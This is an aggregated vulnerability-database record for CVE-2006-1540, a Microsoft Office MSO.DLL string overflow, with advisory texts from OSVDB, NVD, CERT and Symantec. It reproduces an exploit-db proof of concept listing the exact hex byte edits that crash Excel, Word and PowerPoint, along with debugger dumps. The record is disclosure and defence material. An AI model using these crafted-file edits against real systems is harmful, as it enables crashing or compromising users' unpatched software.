Microsoft Office MSO.DLL String Processing Overflow
2006-07-11T15:34:10
ID OSVDB:27150 Type osvdb Reporter Elia Florio(elia_florio@symantec.com) Modified 2006-07-11T15:34:10
Description
Vulnerability Description
A local overflow exists in Office, Project, Visio and Office for Mac. MSO.DLL fails to validate Office documents resulting in a buffer overflow. With a specially crafted file containing a malformed string, an attacker can cause arbitrary code execution resulting in a loss of integrity.
Solution Description
Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.
Short Description
A local overflow exists in Office, Project, Visio and Office for Mac. MSO.DLL fails to validate Office documents resulting in a buffer overflow. With a specially crafted file containing a malformed string, an attacker can cause arbitrary code execution resulting in a loss of integrity.
References:
Secunia Advisory ID:21012Related OSVDB ID: 27149Related OSVDB ID: 27148
Microsoft Security Bulletin: MS06-038
Microsoft Knowledge Base Article: 917284
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0135.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0141.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0120.html
Keyword: SYMSA-2006-007
ISS X-Force ID: 27607
ISS X-Force ID: 27609
Generic Exploit URL: http://www.milw0rm.com/exploits/1615
CVE-2006-1540
CERT VU: 609868
Bugtraq ID: 17252
Bugtraq ID: 18889
{"enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2017-04-28T13:20:23", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-1540"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:13479", "SECURITYVULNS:DOC:13481", "SECURITYVULNS:DOC:13482"]}, {"type": "osvdb", "idList": ["OSVDB:24595"]}, {"type": "exploitdb", "idList": ["EDB-ID:1615"]}, {"type": "cert", "idList": ["VU:609868"]}, {"type": "nessus", "idList": ["SMB_NT_MS06-038.NASL", "MACOSX_MS_06-037.NASL"]}], "modified": "2017-04-28T13:20:23", "rev": 2}, "vulnersScore": 8.1}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Office", "operator": "eq", "version": "2003 SP2"}, {"name": "Visio", "operator": "eq", "version": "2002 SP2"}, {"name": "Project", "operator": "eq", "version": "2000 Service Release 1"}, {"name": "Office", "operator": "eq", "version": "2003 SP1"}, {"name": "Office", "operator": "eq", "version": "2004 for Mac"}, {"name": "Project", "operator": "eq", "version": "2002 SP1"}, {"name": "Office", "operator": "eq", "version": "XP SP3"}, {"name": "Office", "operator": "eq", "version": "2000 SP3"}, {"name": "Office", "operator": "eq", "version": "v. X for Mac"}], "references": [], "href": "https://vulners.com/osvdb/OSVDB:27150", "id": "OSVDB:27150", "title": "Microsoft Office MSO.DLL String Processing Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "lastseen": "2017-04-28T13:20:23", "edition": 1, "reporter": "Elia Florio(elia_florio@symantec.com)", "description": "## Vulnerability Description\nA local overflow exists in Office, Project, Visio and Office for Mac. MSO.DLL fails to validate Office documents resulting in a buffer overflow. With a specially crafted file containing a malformed string, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.\n## Short Description\nA local overflow exists in Office, Project, Visio and Office for Mac. MSO.DLL fails to validate Office documents resulting in a buffer overflow. With a specially crafted file containing a malformed string, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\n[Secunia Advisory ID:21012](https://secuniaresearch.flexerasoftware.com/advisories/21012/)\n[Related OSVDB ID: 27149](https://vulners.com/osvdb/OSVDB:27149)\n[Related OSVDB ID: 27148](https://vulners.com/osvdb/OSVDB:27148)\nMicrosoft Security Bulletin: MS06-038\nMicrosoft Knowledge Base Article: 917284\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0135.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0141.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0120.html\nKeyword: SYMSA-2006-007\nISS X-Force ID: 27607\nISS X-Force ID: 27609\nGeneric Exploit URL: http://www.milw0rm.com/exploits/1615\n[CVE-2006-1540](https://vulners.com/cve/CVE-2006-1540)\nCERT VU: 609868\nBugtraq ID: 17252\nBugtraq ID: 18889\n", "modified": "2006-07-11T15:34:10", "viewCount": 5, "published": "2006-07-11T15:34:10", "cvelist": ["CVE-2006-1540"], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:27:19", "description": "MSO.DLL in Microsoft Office 2000, Office XP (2002), and Office 2003 allows user-assisted attackers to cause a denial of service and execute arbitrary code via multiple attack vectors, as originally demonstrated using a crafted document record with a malformed string, as demonstrated by replacing a certain \"01 00 00 00\" byte sequence with an \"FF FF FF FF\" byte sequence, possibly causing an invalid array index, in (1) an Excel .xls document, which triggers an access violation in ole32.dll; (2) an Excel .xlw document, which triggers an access violation in excel.exe; (3) a Word document, which triggers an access violation in mso.dll in winword.exe; and (4) a PowerPoint document, which triggers an access violation in powerpnt.txt. NOTE: after the initial disclosure, this issue was demonstrated by triggering an integer overflow using an inconsistent size for a Unicode \"Sheet Name\" string.", "edition": 4, "cvss3": {}, "published": "2006-03-30T11:02:00", "title": "CVE-2006-1540", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-1540"], "modified": "2018-10-18T16:33:00", "cpe": ["cpe:/a:microsoft:office:2000", "cpe:/a:microsoft:office:2003", "cpe:/a:microsoft:office:2004", "cpe:/a:microsoft:office:*", "cpe:/a:microsoft:office:v.x", "cpe:/a:microsoft:office:xp"], "id": "CVE-2006-1540", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1540", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:office:v.x:*:*:*:*:mac_os_x:*:*", "cpe:2.3:a:microsoft:office:2000:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2004:*:*:*:*:mac_os_x:*:*", "cpe:2.3:a:microsoft:office:2000:*:*:zh:*:*:*:*", "cpe:2.3:a:microsoft:office:2000:*:*:ja:*:*:*:*", "cpe:2.3:a:microsoft:office:2003:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:xp:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:xp:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2003:*:*:*:student_teacher:*:*:*", "cpe:2.3:a:microsoft:office:2000:*:*:ko:*:*:*:*", "cpe:2.3:a:microsoft:office:2000:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:xp:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:*:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2000:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2003:sp2:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:21", "bulletinFamily": "software", "cvelist": ["CVE-2006-1540"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1015855\nGeneric Exploit URL: http://www.milw0rm.com/exploits/1615\n[CVE-2006-1540](https://vulners.com/cve/CVE-2006-1540)\n", "modified": "2006-02-12T02:57:07", "published": "2006-02-12T02:57:07", "href": "https://vulners.com/osvdb/OSVDB:24595", "id": "OSVDB:24595", "type": "osvdb", "title": "Microsoft Office Malformed BIFF Record Multiple File Format Processing DoS", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:43:15", "bulletinFamily": "info", "cvelist": ["CVE-2006-1540"], "description": "### Overview \n\nMicrosoft Office fails to properly parse strings. This vulnerability could allow a remote attacker to execute arbitrary code. \n\n### Description \n\nMicrosoft Office applications fail to properly parse strings. When an Office document containing malformed string is opened with an Office application, system memory can be corrupted in a way that may allow an attacker to execute arbitrary code. \n\n\nMore information, including a list of affected Office applications, is available in Microsoft Security Bulletin [MS06-038](<http://www.microsoft.com/technet/security/Bulletin/MS06-038.mspx>). \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Apply a patch from Microsoft ** \nMicrosoft addresses this vulnerability with the updates listed in Microsoft Security Bulletin [MS06-038.](<http://www.microsoft.com/technet/security/Bulletin/MS06-012.mspx>) \n \n--- \n \n**Do not access Office documents from untrusted sources**\n\n \nBy only accessing Office documents, such as spreadsheets or Microsoft Word documents, from trusted or known sources, the chances of exploitation are reduced. \n \n--- \n \n### Vendor Information\n\n609868\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation __ Affected\n\nUpdated: July 11, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.microsoft.com/technet/security/Bulletin/MS06-038.mspx>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23609868 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n<http://www.microsoft.com/technet/security/bulletin/ms06-038.mspx>\n\n### Acknowledgements\n\nThis vulnerability was reported in Microsoft Security Bulletin MS06-038. Microsoft credits Elia Florio of Symantec with providing information regarding this vulnerability.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-1540](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-1540>) \n---|--- \n**Severity Metric:** | 33.67 \n**Date Public:** | 2006-07-11 \n**Date First Published:** | 2006-07-11 \n**Date Last Updated: ** | 2006-07-11 21:09 UTC \n**Document Revision: ** | 8 \n", "modified": "2006-07-11T21:09:00", "published": "2006-07-11T00:00:00", "id": "VU:609868", "href": "https://www.kb.cert.org/vuls/id/609868", "type": "cert", "title": "Microsoft Office string parsing vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T14:33:18", "description": "MS Office Products Array Index Bounds Error (unpatched) PoC. CVE-2006-1540. Dos exploit for windows platform", "published": "2006-03-27T00:00:00", "type": "exploitdb", "title": "Microsoft Office Products - Array Index Bounds Error Unpatched PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-1540"], "modified": "2006-03-27T00:00:00", "id": "EDB-ID:1615", "href": "https://www.exploit-db.com/exploits/1615/", "sourceData": "# Full archive at https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1615.rar (excel_03262006.rar)\r\n\r\nTopic : Microsoft Office 2002 - Excel/Powerpoint/Word.. 10.0.2614.0 => 11.0.5612.0\r\nDate : 02/12/2006\r\nAuthor : posidron <posidron@tripbit.net>\r\n\r\n\r\nTable of Contens\r\n================\r\n- Some Excel Information\r\n- The XLS File Format and Observation\r\n- The XLW File Format and Observation\r\n- Powerpoint and Word Dump Additions\r\n- Conclusion\r\n- References\r\n\r\n\r\nSome Excel Information\r\n======================\r\n- Microsoft Excel uses the BIFF (Binary Interchange File Format)\r\n- in Excel 8.0 (Excel 97), BIFF8 was introduced\r\n- in Excel 10.0 (Excel XP), BIFF8X was introduced\r\n- Excel 97 and Excel 2000 can read BIFF8X, except new features added with Excel XP.\r\n\r\nSince BIFF5, all data is saved in OLE2 Storage Format/Structured Storage, which\r\ncan contain streams and storages.\r\n\r\n\r\nA BIFF record is builded as follows:\r\n\r\n Offset \tSize \tContents \t \r\n 0 2 Identifier }\r\n 2 2 Size of the following data (sz) } Record header \t \r\n 4 \t sz \tData\r\n\r\n\r\n\r\nThe XLS File Format\r\n===================\r\nIf we open an Excel .xls workbook document with a hexeditor, we can see the\r\nbelow block of records, which exists multiple times within an Excel document.\r\n\r\n(Offsets are hexadecimal)\r\n\r\norig.xls\r\n--------\r\nOffset 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15\r\n00001200 FE FF 00 00 05 01 02 00 00 00 00 00 00 00 00 00 \u00fe\u00ff..............\r\n00001210 00 00 00 00 00 00 00 00 01 00 00 00 E0 85 9F F2 ............\u00e0..\u00f2\r\n00001220 F9 4F 68 10 AB 91 08 00 2B 27 B3 D9 30 00 00 00 \u00f9Oh.\u00ab...+'\u00b3\u00d90...\r\n00001230 B0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 \u00b0...........@...\r\n00001240 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 ....H.......`...\r\n\r\nIf we change the second line from\r\n00001210 00 00 00 00 00 00 00 00 01 00 00 00 E0 85 9F F2 ............\u00e0..\u00f2\r\nto\r\n00001210 00 00 00 00 00 00 00 00 FF FF FF FF E0 85 9F F2 ............\u00e0..\u00f2\r\nwe get an 'Access Violation' in OLE32.DLL after opening the dcument in Excel.\r\n\r\n(ole32.dll)\r\n774D66B6 8B73 0C MOV ESI,DWORD PTR DS:[EBX+C]\r\n774D66B9 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10]\r\n774D66BC 8B7D 0C MOV EDI,DWORD PTR SS:[EBP+C]\r\n774D66BF 03F0 ADD ESI,EAX\r\n774D66C1 8BC1 MOV EAX,ECX\r\n774D66C3 C1E9 02 SHR ECX,2\r\n774D66C6 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] <==\r\n\r\nECX=00000369 (decimal 873.)\r\nDS:[ESI]=[001B24F4]=00000000\r\nES:[EDI]=[00924000]=???\r\n\r\nESP ==> 0013786C 00923AE0\r\nEBP-8 00137870 00923AE4\r\nEBP-4 00137874 00923ADC\r\nEBP ==> 00137878 /001378AC\r\nEBP+4 0013787C |30C12D83 RETURN to mso.30C12D83\r\nEBP+8 00137880 |001B32A8\r\nEBP+C 00137884 |00923DC0\r\nEBP+10 00137888 |00000FE4\r\n\r\nEAX 00000FE4\r\nECX 00000369\r\nEDX 00150608\r\nEBX 001AE948\r\nESP 0013786C\r\nEBP 00137878\r\nESI 001B24F4\r\nEDI 00924000\r\nEIP 774D66C6 OLE32.774D66C6\r\n\r\nWe found this block of records two times in an empty Excel document. I haven't\r\nfound an exact explanation about these records. It could be, that the record\r\nFFFE defines the sheet range. More in the OpenOffice reference link on site 100.\r\n\r\n\r\n\r\n\r\nThe XLW File Format\r\n===================\r\nIf we open an Excel .xlw Workbook document with a hexeditor, we can see the\r\nbelow sequence of records, which exists multiple times within an Excel document.\r\n\r\n(Offsets are hexadecimal)\r\n\r\norig.xlw\r\n--------\r\nOffset 0 1 2 3 4 5 6 7 8 9 A B C D E F\r\n00000110 38 00 04 00 01 00 10 00 3D 00 0A 00 68 01 87 00 8.......=...h...\r\n00000120 8C 28 8D 18 04 00 3E 02 0A 00 B6 00 00 00 00 00 .(\u008d...>...\u00b6.....\r\n00000130 00 00 00 00 1D 00 0F 00 03 00 00 00 00 00 00 01 ................\r\n00000140 00 00 00 00 00 00 00 0D 00 02 00 01 00 0C 00 02 ................\r\n00000150 00 64 00 0F 00 02 00 01 00 11 00 02 00 00 00 10 .d..............\r\n\r\nIf we change the third and fourth line from\r\n00000130 00 00 00 00 1D 00 0F 00 03 00 00 00 00 00 00 01 ................\r\n00000140 00 00 00 00 00 00 00 0D 00 02 00 01 00 0C 00 02 ................\r\nto\r\n00000130 00 00 00 00 1D 00 0F 00 03 00 00 00 00 00 00 FF ................\r\n00000140 FF FF FF 00 00 00 00 0D 00 02 00 01 00 0C 00 02 ................\r\nwe got an 'Access Violation' in excel.exe after opening the ducument in Excel.\r\n\r\n\r\nExamine dump at offset: 00000110+8\r\n\r\n WINDOW1 | 04 Bytes | 3D 00 0A 00\r\n WINDOW1 | 10 Bytes | 68 01 87 00 8C 28 8D 18 04 00\r\n WINDOW1 | 04 Bytes | 3E 02 0A 00\r\n WINDOW2 | 10 Bytes | B6 00 00 00 00 00 00 00 00 00\r\n SELECTION | 04 Bytes | 1D 00 0F 00\r\n SELECTION | 15 Bytes | 03 00 00 00 00 00 00 01 00 00 00 00 00 00 00\r\n\r\nAbout the SELECTION record (00 1D):\r\n\r\n Offset Size \tContents\r\n 0 1 \tPane identifier\r\n 1 2 \tIndex to row of the active cell\r\n 3 2 \tIndex to column of the active cell\r\n 5 2 Index into the following cell range list\r\n to the entry that contains the active cell\r\n 7 variable Cell range address list containing all selected\r\n cell ranges. Column indexes are always 8-bit values.\r\n\r\n This record contains the addresses of all selected cell ranges and the\r\n position of the active cell for a pane in current sheet. It is part of\r\n the \"Sheet View Settings Block\". There is one SELECTION record for each\r\n pane in the sheet. \r\n\r\n\r\nexcel.exe\r\n---------\r\n30028546 C2 0800 RETN 8\r\n30028549 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]\r\n3002854D 8B15 484E7D30 MOV EDX,DWORD PTR DS:[307D4E48]\r\n30028553 56 PUSH ESI\r\n30028554 57 PUSH EDI\r\n30028555 66:8B40 06 MOV AX,WORD PTR DS:[EAX+6] <==\r\n30028559 8B7C24 10 MOV EDI,DWORD PTR SS:[ESP+10]\r\n3002855D 25 FF0F0000 AND EAX,0FFF\r\n30028562 8D0C40 LEA ECX,DWORD PTR DS:[EAX+EAX*2]\r\n30028565 8B42 10 MOV EAX,DWORD PTR DS:[EDX+10]\r\n30028568 8D34C8 LEA ESI,DWORD PTR DS:[EAX+ECX*8]\r\n3002856B B9 05000000 MOV ECX,5\r\n30028570 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>\r\n30028572 5F POP EDI\r\n30028573 5E POP ESI\r\n30028574 C2 0800 RETN 8\r\n\r\nDS:[01642A72]=???\r\nAX=2A6C\r\n\r\nEAX 01642A6C\r\nECX 00000015\r\nEDX 015C15DC\r\nEBX 00000001\r\nESP 00136964\r\nEBP 00136B00\r\nESI 00007979\r\nEDI 00000000\r\nEIP 30028555 EXCEL.30028555\r\n\r\nESP ==> 00136964 00000000\r\nESP+4 00136968 00007979\r\nESP+8 0013696C 30027795 RETURN to EXCEL.30027795 from EXCEL.30028549\r\nESP+C 00136970 01642A6C\r\nESP+10 00136974 001369A4\r\nESP+14 00136978 00000001\r\nESP+18 0013697C 00000000\r\nESP+1C 00136980 00000000\r\nESP+20 00136984 77D1BC7D USER32.GetWindow\r\nESP+24 00136988 00AB0208\r\nESP+28 0013698C 00000000\r\nESP+2C 00136990 7FFDF000\r\nESP+30 00136994 00000058\r\nESP+34 00136998 00000053\r\nESP+38 0013699C 0000059B\r\nESP+3C 001369A0 00000023\r\nESP+40 001369A4 001369CC\r\nESP+44 001369A8 77D4F160 RETURN to USER32.77D4F160 from USER32.77D318A2\r\nESP+48 001369AC 00040000\r\nESP+4C 001369B0 00000000\r\nESP+50 001369B4 77EF7AB2 RETURN to GDI32.77EF7AB2\r\n\r\n\r\nIn the SELECTION record, it's regardless which offset address we overwrite\r\nto produce an exception. If we play with the values/offsets in the SELECTION\r\nrecord, we get many different results.\r\n\r\n\r\nAnother example:\r\n\r\n SELECTION | 04 Bytes | 1D 00 0F 00\r\n SELECTION | 15 Bytes | 03 00 00 00 00 00 00 FF FF FF FF FF FF 00 00\r\n\r\n\r\n(mso.dll)\r\n30B1BCEA 66:8955 00 MOV WORD PTR SS:[EBP],DX\r\n30B1BCEE 66:8975 02 MOV WORD PTR SS:[EBP+2],SI\r\n30B1BCF2 66:892F MOV WORD PTR DS:[EDI],BP\r\n30B1BCF5 66:897428 FE MOV WORD PTR DS:[EAX+EBP-2],SI <==\r\n30B1BCFA 8B4424 18 MOV EAX,DWORD PTR SS:[ESP+18]\r\n30B1BCFE 5B POP EBX\r\n\r\nEAX 00006F24\r\nECX 00006000\r\nEDX 00000DDC\r\nEBX 000007ED\r\nESP 0013FCF4\r\nEBP 015C0DE0\r\nESI 00006F24\r\nEDI 015C0000\r\nEIP 30B1BCF5 mso.30B1BCF5\r\n\r\nSI=6F24\r\nDS:[015C7D02]=???\r\n\r\nESP ==> 0013FCF4 00000000\r\nESP+4 0013FCF8 00000000\r\nESP+8 0013FCFC 30B1BBB0 mso.__MsoPvFree@8\r\n\r\n\r\n\r\nFor the completeness Powerpoint and Word which have the same structure as in\r\nthe .xls file format.\r\n\r\nMicrosoft Word\r\n--------------\r\nOffset 0 1 2 3 4 5 6 7 8 9 A B C D E F\r\n00002400 FE FF 00 00 05 01 02 00 00 00 00 00 00 00 00 00 \u00fe\u00ff..............\r\n00002410 00 00 00 00 00 00 00 00 01 00 00 00 E0 85 9F F2 ............\u00e0..\u00f2\r\n00002420 F9 4F 68 10 AB 91 08 00 2B 27 B3 D9 30 00 00 00 \u00f9Oh.\u00ab...+'\u00b3\u00d90...\r\nto\r\nOffset 0 1 2 3 4 5 6 7 8 9 A B C D E F\r\n00002400 FE FF 00 00 05 01 02 00 00 00 00 00 00 00 00 00 \u00fe\u00ff..............\r\n00002410 00 00 00 00 00 00 00 00 FF FF FF FF E0 85 9F F2 ............\u00e0..\u00f2\r\n00002420 F9 4F 68 10 AB 91 08 00 2B 27 B3 D9 30 00 00 00 \u00f9Oh.\u00ab...+'\u00b3\u00d90...\r\nResults in an 'Access Violation'.\r\n\r\nAppName: winword.exe\t AppVer: 10.0.2627.0\t ModName: mso.dll\r\nModVer: 10.0.2625.0\t Offset: 0001b411\r\n\r\n\r\nMicrosoft Powerpoint\r\n--------------------\r\nOffset 0 1 2 3 4 5 6 7 8 9 A B C D E F\r\n00001A00 FE FF 00 00 05 01 02 00 00 00 00 00 00 00 00 00 \u00fe\u00ff..............\r\n00001A10 00 00 00 00 00 00 00 00 01 00 00 00 02 D5 CD D5 .............\u00d5\u00cd\u00d5\r\n00001A20 9C 2E 1B 10 93 97 08 00 2B 2C F9 AE 30 00 00 00 ........+,\u00f9\u00ae0...\r\nto\r\n00001A00 FE FF 00 00 05 01 02 00 00 00 00 00 00 00 00 00 \u00fe\u00ff..............\r\n00001A10 00 00 00 00 00 00 00 00 FF FF FF FF 02 D5 CD D5 .............\u00d5\u00cd\u00d5\r\n00001A20 9C 2E 1B 10 93 97 08 00 2B 2C F9 AE 30 00 00 00 ........+,\u00f9\u00ae0...\r\nResults in an 'Access Violation'.\r\n\r\nAppName: powerpnt.exe\t AppVer: 10.0.2623.0\t ModName: mso.dll\r\nModVer: 10.0.2625.0\t Offset: 0011300d\r\n\r\n\r\n\r\nReferences\r\n----------\r\nExcel File Format Structure (http://sc.openoffice.org/excelfileformat.pdf)\r\n\r\n# milw0rm.com [2006-03-27]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1615/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "cvelist": ["CVE-2006-1540"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n\r\n Symantec Vulnerability Research\r\n http://www.symantec.com/research\r\n Security Advisory\r\n\r\n\r\nAdvisory ID : SYMSA-2006-007\r\nAdvisory Title: Microsoft Office Malformed String\r\nParsing\r\n Vulnerability\r\nAuthor : Elia Florio /\r\nelia_florio@symantec.com\r\nRelease Date : 07-11-2006\r\nApplication : Microsoft Office 2000, Office XP\r\n(2002),\r\n Office 2003\r\nPlatform : Windows\r\nSeverity : Remotely exploitable / User access\r\nVendor status : Duplicated and verified by\r\nMicrosoft,\r\n patch available\r\nCVE Number : CVE-2006-1540\r\nReference :\r\nhttp://www.securityfocus.com/bid/18889\r\n\r\n\r\nOverview:\r\n\r\n There exists an overflow condition in\r\nMicrosoft Office\r\n when a malformed string included in an\r\nOffice file is\r\n parsed by any of the affected Office\r\napplications.\r\n\r\n\r\nDetails:\r\n\r\n The problem resides in the code of\r\nMSO.DLL, a shared\r\n library used by Office applications, so\r\nthe vulnerability\r\n can be exploited using different attack\r\nvectors.\r\n For example, the vulnerability can be\r\nexploited using a\r\n malformed Excel 2003 file. By changing\r\nthe size of the\r\n Unicode "Sheet Name" string with an\r\nincorrect size, it is\r\n possible to generate an integer overflow\r\ncondition. Excel\r\n 2003 will crash while opening the\r\nmalformed file due to an\r\n access violation error with an invalid\r\nvalue of\r\n EAX=0xFFFFFFFC.\r\n\r\n MOV EDX,DWORD PTR DS:[EAX-4]\r\n ADD EAX,-4\r\n ADD EDX,4\r\n\r\n\r\nVendor Response:\r\n\r\n The above vulnerability was addressed for\r\nthe affected\r\n platforms via Microsoft Security Bulletin\r\nMS06-38. If\r\n there are any further questions about\r\nthis statement,\r\n please contact secure@microsoft.com.\r\n\r\n\r\nRecommendation:\r\n Follow your organization's testing\r\nprocedures before\r\n applying patches or workarounds. \r\nCustomers should apply\r\n Microsoft's update as soon as possible.\r\n\r\n\r\nCommon Vulnerabilities and Exposures (CVE)\r\nInformation:\r\n\r\nThe Common Vulnerabilities and Exposures (CVE)\r\nproject has assigned\r\nthe following names to these issues. These are\r\ncandidates for\r\ninclusion in the CVE list (http://cve.mitre.org),\r\nwhich standardizes\r\nnames for security problems.\r\n\r\n CVE-2006-1540\r\n\r\n\r\n- -------Symantec Vulnerability Research Advisory\r\nInformation-------\r\n\r\nFor questions about this advisory, or to report\r\nan error:\r\nresearch@symantec.com\r\n\r\nFor details on Symantec's Vulnerability Reporting\r\nPolicy:\r\nhttp://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf\r\n\r\nSymantec Vulnerability Research Advisory Archive:\r\nhttp://www.symantec.com/research/\r\n\r\nSymantec Vulnerability Research GPG Key:\r\nhttp://www.symantec.com/research/Symantec_Consulting_Services_Advisories_GPG.asc\r\n\r\n- -------------Symantec Product Advisory\r\nInformation-------------\r\n\r\nTo Report a Security Vulnerability in a Symantec\r\nProduct:\r\nsecure@symantec.com\r\n\r\nFor general information on Symantec's Product\r\nVulnerability\r\nreporting and response:\r\nhttp://www.symantec.com/security/\r\n\r\nSymantec Product Advisory Archive:\r\nhttp://www.symantec.com/avcenter/security/SymantecAdvisories.html\r\n\r\nSymantec Product Advisory PGP Key:\r\nhttp://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc\r\n\r\n-\r\n---------------------------------------------------------------\r\n\r\nCopyright (c) 2006 by Symantec Corp.\r\nPermission to redistribute this alert\r\nelectronically is granted\r\nas long as it is not edited in any way unless\r\nauthorized by\r\nSymantec Consulting Services. Reprinting the\r\nwhole or part of\r\nthis alert in any medium other than\r\nelectronically requires\r\npermission from cs_advisories@symantec.com.\r\n\r\nDisclaimer\r\nThe information in the advisory is believed to be\r\naccurate at the\r\ntime of publishing based on currently available\r\ninformation. Use\r\nof the information constitutes acceptance for use\r\nin an AS IS\r\ncondition. There are no warranties with regard to\r\nthis information.\r\nNeither the author nor the publisher accepts any\r\nliability for any\r\ndirect, indirect, or consequential loss or damage\r\narising from use\r\nof, or reliance on, this information.\r\n\r\nSymantec, Symantec products, and Symantec\r\nConsulting Services are\r\nregistered trademarks of Symantec Corp. and/or\r\naffiliated companies\r\nin the United States and other countries. All\r\nother registered and\r\nunregistered trademarks represented in this\r\ndocument are the sole\r\nproperty of their respective companies/owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.0 (Cygwin)\r\n\r\niD8DBQFEspITuk7IIFI45IARAiJyAJ4gvZGmSFL5B+ZOpCYrq3pXQrH6WgCgjDJu\r\nc6RMB/od64/cLbHSwy3EC/w=\r\n=MYz8\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2006-07-11T00:00:00", "published": "2006-07-11T00:00:00", "id": "SECURITYVULNS:DOC:13482", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13482", "title": "SYMSA-2006-007: Microsoft Office Malformed String Parsing Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "cvelist": ["CVE-2006-1540"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n\r\n Symantec Vulnerability Research\r\n http://www.symantec.com/research\r\n Security Advisory\r\n\r\n\r\nAdvisory ID : SYMSA-2006-007\r\nAdvisory Title: Microsoft Office Malformed String\r\nParsing\r\n Vulnerability\r\nAuthor : Elia Florio /\r\nelia_florio@symantec.com\r\nRelease Date : 07-11-2006\r\nApplication : Microsoft Office 2000, Office XP\r\n(2002),\r\n Office 2003\r\nPlatform : Windows\r\nSeverity : Remotely exploitable / User access\r\nVendor status : Duplicated and verified by\r\nMicrosoft,\r\n patch available\r\nCVE Number : CVE-2006-1540\r\nReference :\r\nhttp://www.securityfocus.com/bid/18889\r\n\r\n\r\nOverview:\r\n\r\n 